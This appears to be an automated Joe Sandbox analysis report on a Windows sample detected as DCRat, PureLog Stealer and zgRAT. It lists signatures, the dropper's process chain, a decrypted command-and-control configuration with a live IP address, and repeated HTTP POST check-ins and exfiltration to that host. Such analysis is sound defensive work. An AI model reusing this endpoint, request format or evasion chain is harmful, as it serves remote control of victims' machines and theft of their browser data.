Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
9FwQYJSj4N.exe

Overview

General Information

Sample name:9FwQYJSj4N.exe
renamed because original name is a hash value
Original sample name:9342BE038F6FF329AAFFDC2626F8D145.exe
Analysis ID:1579262
MD5:9342be038f6ff329aaffdc2626f8d145
SHA1:5e2bc708ba51774175679f7cde6c9900c957bb42
SHA256:396a47040ce6fbbaf684ae9d4c1abe7bc8901113d3c017f41276145d6a04a103
Tags:DCRatexeuser-abuse_ch
Infos:

Detection

DCRat, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (creates a PE file in dynamic memory)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
AI detected suspicious sample
Drops PE files with benign system names
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Files With System Process Name In Unsuspected Locations
Tries to harvest and steal browser information (history, passwords, etc)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to detect virtual machines (SGDT)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • 9FwQYJSj4N.exe (PID: 6148 cmdline: "C:\Users\user\Desktop\9FwQYJSj4N.exe" MD5: 9342BE038F6FF329AAFFDC2626F8D145)
    • wscript.exe (PID: 1124 cmdline: "C:\Windows\System32\WScript.exe" "C:\providerBrowserruntimeCrt\RKDq4baPXf3oYQLQ9KOfosRSo5hZYYngNhYF.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 3572 cmdline: C:\Windows\system32\cmd.exe /c ""C:\providerBrowserruntimeCrt\EOj1ahBHdasVqOTXmQoagNDGVj6XidHKqZ.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 3868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • Providerbroker.exe (PID: 6204 cmdline: "C:\providerBrowserruntimeCrt/Providerbroker.exe" MD5: ADAE028E0A5A72D219A02BB06D92241A)
          • cmd.exe (PID: 3568 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Ze4zcGVeMm.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chcp.com (PID: 5512 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
            • PING.EXE (PID: 6764 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
            • BSlvAOjamepaXWJMhY.exe (PID: 5148 cmdline: "C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe" MD5: ADAE028E0A5A72D219A02BB06D92241A)
  • cleanup
{"C2 url": "http://89.23.96.180/03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
SourceRuleDescriptionAuthorStrings
9FwQYJSj4N.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
    9FwQYJSj4N.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      C:\Windows\PrintDialog\pris\spoolsv.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
        C:\Windows\PrintDialog\pris\spoolsv.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          C:\Program Files\Common Files\BSlvAOjamepaXWJMhY.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
            C:\Program Files\Common Files\BSlvAOjamepaXWJMhY.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              C:\Recovery\ApplicationFrameHost.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                Click to see the 7 entries
                SourceRuleDescriptionAuthorStrings
                00000000.00000003.2080050228.00000000048E7000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  00000000.00000003.2080638886.00000000048E8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                    00000005.00000000.2131916065.0000000000452000.00000002.00000001.01000000.0000000A.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                      0000000C.00000002.3319845623.0000000003477000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                        0000000C.00000002.3319845623.0000000003810000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                          Click to see the 5 entries
                          SourceRuleDescriptionAuthorStrings
                          0.3.9FwQYJSj4N.exe.49354fb.0.raw.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                            0.3.9FwQYJSj4N.exe.49354fb.0.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                              0.3.9FwQYJSj4N.exe.49364fb.1.raw.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                                0.3.9FwQYJSj4N.exe.49364fb.1.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                                  0.3.9FwQYJSj4N.exe.49354fb.0.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                                    Click to see the 5 entries

                                    System Summary

                                    barindex
                                    Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\providerBrowserruntimeCrt\Providerbroker.exe, ProcessId: 6204, TargetFilename: C:\Windows\PrintDialog\pris\spoolsv.exe
                                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\providerBrowserruntimeCrt\RKDq4baPXf3oYQLQ9KOfosRSo5hZYYngNhYF.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\providerBrowserruntimeCrt\RKDq4baPXf3oYQLQ9KOfosRSo5hZYYngNhYF.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\9FwQYJSj4N.exe", ParentImage: C:\Users\user\Desktop\9FwQYJSj4N.exe, ParentProcessId: 6148, ParentProcessName: 9FwQYJSj4N.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\providerBrowserruntimeCrt\RKDq4baPXf3oYQLQ9KOfosRSo5hZYYngNhYF.vbe" , ProcessId: 1124, ProcessName: wscript.exe
                                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                    2024-12-21T10:02:31.515294+010020480951A Network Trojan was detected192.168.2.54973489.23.96.18080TCP
                                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                    2024-12-21T10:02:54.567893+010020481301A Network Trojan was detected192.168.2.54979889.23.96.18080TCP

                                    Click to jump to signature section

                                    Show All Signature Results

                                    AV Detection

                                    barindex
                                    Source: 9FwQYJSj4N.exeAvira: detected
                                    Source: C:\Program Files\Common Files\BSlvAOjamepaXWJMhY.exeAvira: detection malicious, Label: HEUR/AGEN.1339906
                                    Source: C:\Users\user\Desktop\BqwHRBKU.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                                    Source: C:\Program Files\Common Files\BSlvAOjamepaXWJMhY.exeAvira: detection malicious, Label: HEUR/AGEN.1339906
                                    Source: C:\Users\user\Desktop\RRtweJUq.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                                    Source: C:\Users\user\Desktop\NsJXliNz.logAvira: detection malicious, Label: HEUR/AGEN.1362695
                                    Source: C:\Users\user\Desktop\BmbzgENi.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                                    Source: C:\Users\user\AppData\Local\Temp\Ze4zcGVeMm.batAvira: detection malicious, Label: BAT/Delbat.C
                                    Source: C:\Users\user\Desktop\GidQnkDb.logAvira: detection malicious, Label: TR/AD.BitpyRansom.lcksd
                                    Source: C:\Users\user\Desktop\QURoIJFv.logAvira: detection malicious, Label: TR/AVI.Agent.updqb
                                    Source: C:\Recovery\ApplicationFrameHost.exeAvira: detection malicious, Label: HEUR/AGEN.1339906
                                    Source: 00000005.00000002.2204609907.00000000130C6000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: DCRat {"C2 url": "http://89.23.96.180/03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
                                    Source: C:\Program Files\Common Files\BSlvAOjamepaXWJMhY.exeReversingLabs: Detection: 79%
                                    Source: C:\Program Files\Windows Photo Viewer\en-GB\BSlvAOjamepaXWJMhY.exeReversingLabs: Detection: 79%
                                    Source: C:\Recovery\ApplicationFrameHost.exeReversingLabs: Detection: 79%
                                    Source: C:\Users\user\Desktop\AtVzwBvZ.logReversingLabs: Detection: 15%
                                    Source: C:\Users\user\Desktop\GidQnkDb.logReversingLabs: Detection: 33%
                                    Source: C:\Users\user\Desktop\IZCgKuwL.logReversingLabs: Detection: 20%
                                    Source: C:\Users\user\Desktop\JXdofuLG.logReversingLabs: Detection: 25%
                                    Source: C:\Users\user\Desktop\KYTGugDU.logReversingLabs: Detection: 25%
                                    Source: C:\Users\user\Desktop\NJzXBuON.logReversingLabs: Detection: 29%
                                    Source: C:\Users\user\Desktop\QURoIJFv.logReversingLabs: Detection: 50%
                                    Source: C:\Users\user\Desktop\VIjnlGUj.logReversingLabs: Detection: 29%
                                    Source: C:\Users\user\Desktop\VMyxesyD.logReversingLabs: Detection: 20%
                                    Source: C:\Users\user\Desktop\VWRNVcdg.logReversingLabs: Detection: 33%
                                    Source: C:\Users\user\Desktop\WJZFAsNx.logReversingLabs: Detection: 50%
                                    Source: C:\Users\user\Desktop\YYEvrLib.logReversingLabs: Detection: 29%
                                    Source: C:\Users\user\Desktop\YuFVHGXq.logReversingLabs: Detection: 20%
                                    Source: C:\Users\user\Desktop\bnUEsCJp.logReversingLabs: Detection: 15%
                                    Source: C:\Users\user\Desktop\fneLqjpL.logReversingLabs: Detection: 25%
                                    Source: C:\Users\user\Desktop\gCMlaExJ.logReversingLabs: Detection: 37%
                                    Source: C:\Users\user\Desktop\hgxdViOd.logReversingLabs: Detection: 25%
                                    Source: C:\Users\user\Desktop\jaztMisT.logReversingLabs: Detection: 29%
                                    Source: C:\Users\user\Desktop\ksDciByC.logReversingLabs: Detection: 50%
                                    Source: C:\Users\user\Desktop\lWnUcfOW.logReversingLabs: Detection: 25%
                                    Source: C:\Users\user\Desktop\lkWuMAXT.logReversingLabs: Detection: 37%
                                    Source: C:\Users\user\Desktop\oitSpyyv.logReversingLabs: Detection: 20%
                                    Source: C:\Users\user\Desktop\rxJbrpZI.logReversingLabs: Detection: 20%
                                    Source: C:\Users\user\Desktop\wDeIoEvg.logReversingLabs: Detection: 25%
                                    Source: C:\Users\user\Desktop\zFRrKozb.logReversingLabs: Detection: 20%
                                    Source: C:\Users\user\Desktop\zsYipEjs.logReversingLabs: Detection: 50%
                                    Source: C:\Windows\PrintDialog\pris\spoolsv.exeReversingLabs: Detection: 79%
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeReversingLabs: Detection: 79%
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeReversingLabs: Detection: 79%
                                    Source: 9FwQYJSj4N.exeVirustotal: Detection: 59%Perma Link
                                    Source: 9FwQYJSj4N.exeReversingLabs: Detection: 68%
                                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                                    Source: C:\Users\user\Desktop\HrJyYQpO.logJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\NJzXBuON.logJoe Sandbox ML: detected
                                    Source: C:\Program Files\Common Files\BSlvAOjamepaXWJMhY.exeJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\BqwHRBKU.logJoe Sandbox ML: detected
                                    Source: C:\Program Files\Common Files\BSlvAOjamepaXWJMhY.exeJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\VIjnlGUj.logJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\AtVzwBvZ.logJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\RRtweJUq.logJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\NsJXliNz.logJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\BmbzgENi.logJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\HjZguhPI.logJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\HAgyIDIK.logJoe Sandbox ML: detected
                                    Source: C:\Recovery\ApplicationFrameHost.exeJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\VMyxesyD.logJoe Sandbox ML: detected
                                    Source: 9FwQYJSj4N.exeJoe Sandbox ML: detected
                                    Source: 00000005.00000002.2204609907.00000000130C6000.00000004.00000800.00020000.00000000.sdmpString decryptor: ["SQiDocn60p5igPZHgvkZipIORtqG4iK2FRWuhXyFf4g6iOZq7oF5C05nHTv5vhBSfDcO2pkJ6e3oIMpDUAJPdOzPWtmNl3U82ObfwKyRE59h6Re5oslvYwyQNN2ICXhC","886b964eacdf58df64ccd2e35a7cc93f02ef5b995bb1b61ec19d87c5f2d1fe93","0","","","5","2","WyIxIiwiIiwiNSJd","WyIxIiwiV3lJaUxDSWlMQ0psZVVsM1NXcHZhV1V4VGxwVk1WSkdWRlZTVTFOV1drWm1VemxXWXpKV2VXTjVPR2xNUTBsNFNXcHZhVnB0Um5Oak1sVnBURU5KZVVscWIybGFiVVp6WXpKVmFVeERTWHBKYW05cFpFaEtNVnBUU1hOSmFsRnBUMmxLTUdOdVZteEphWGRwVGxOSk5rbHVVbmxrVjFWcFRFTkpNa2xxYjJsa1NFb3hXbE5KYzBscVkybFBhVXB0V1ZkNGVscFRTWE5KYW1kcFQybEtNR051Vm14SmFYZHBUMU5KTmtsdVVubGtWMVZwVEVOSmVFMURTVFpKYmxKNVpGZFZhVXhEU1hoTlUwazJTVzVTZVdSWFZXbE1RMGw0VFdsSk5rbHVVbmxrVjFWcFRFTkplRTE1U1RaSmJsSjVaRmRWYVV4RFNYaE9RMGsyU1c1U2VXUlhWV2xtVVQwOUlsMD0iXQ=="]
                                    Source: 00000005.00000002.2204609907.00000000130C6000.00000004.00000800.00020000.00000000.sdmpString decryptor: [["http://89.23.96.180/03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/","ImagepythonRequestLowGeocpuwpTemporary"]]

                                    Compliance

                                    barindex
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeUnpacked PE file: 5.2.Providerbroker.exe.1260000.6.unpack
                                    Source: 9FwQYJSj4N.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeDirectory created: C:\Program Files\Windows Photo Viewer\en-GB\BSlvAOjamepaXWJMhY.exeJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeDirectory created: C:\Program Files\Windows Photo Viewer\en-GB\81eb946674e99fJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeDirectory created: C:\Program Files\Common Files\BSlvAOjamepaXWJMhY.exeJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeDirectory created: C:\Program Files\Common Files\81eb946674e99fJump to behavior
                                    Source: 9FwQYJSj4N.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 9FwQYJSj4N.exe
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeCode function: 0_2_0100A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0100A69B
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeCode function: 0_2_0102B348 FindFirstFileExA,0_2_0102B348
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeCode function: 0_2_0101C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_0101C220
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeFile opened: C:\Users\userJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeFile opened: C:\Users\user\AppDataJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeCode function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh5_2_00007FF84903B7C5
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeCode function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh12_2_00007FF8490CB81D

                                    Networking

                                    barindex
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49734 -> 89.23.96.180:80
                                    Source: Network trafficSuricata IDS: 2048130 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Exfiltration (POST) : 192.168.2.5:49798 -> 89.23.96.180:80
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: Joe Sandbox ViewASN Name: MAXITEL-ASRU MAXITEL-ASRU
                                    Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.96.180Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.96.180Content-Length: 384Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.96.180Content-Length: 2536Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.96.180Content-Length: 2112Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.96.180Content-Length: 2532Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.96.180Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.96.180Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.96.180Content-Length: 2112Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.96.180Content-Length: 2536Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.96.180Content-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.96.180Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.96.180Content-Length: 2112Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.96.180Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.96.180Content-Length: 2536Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.96.180Content-Length: 2536Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.96.180Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.96.180Content-Length: 2100Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.96.180Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
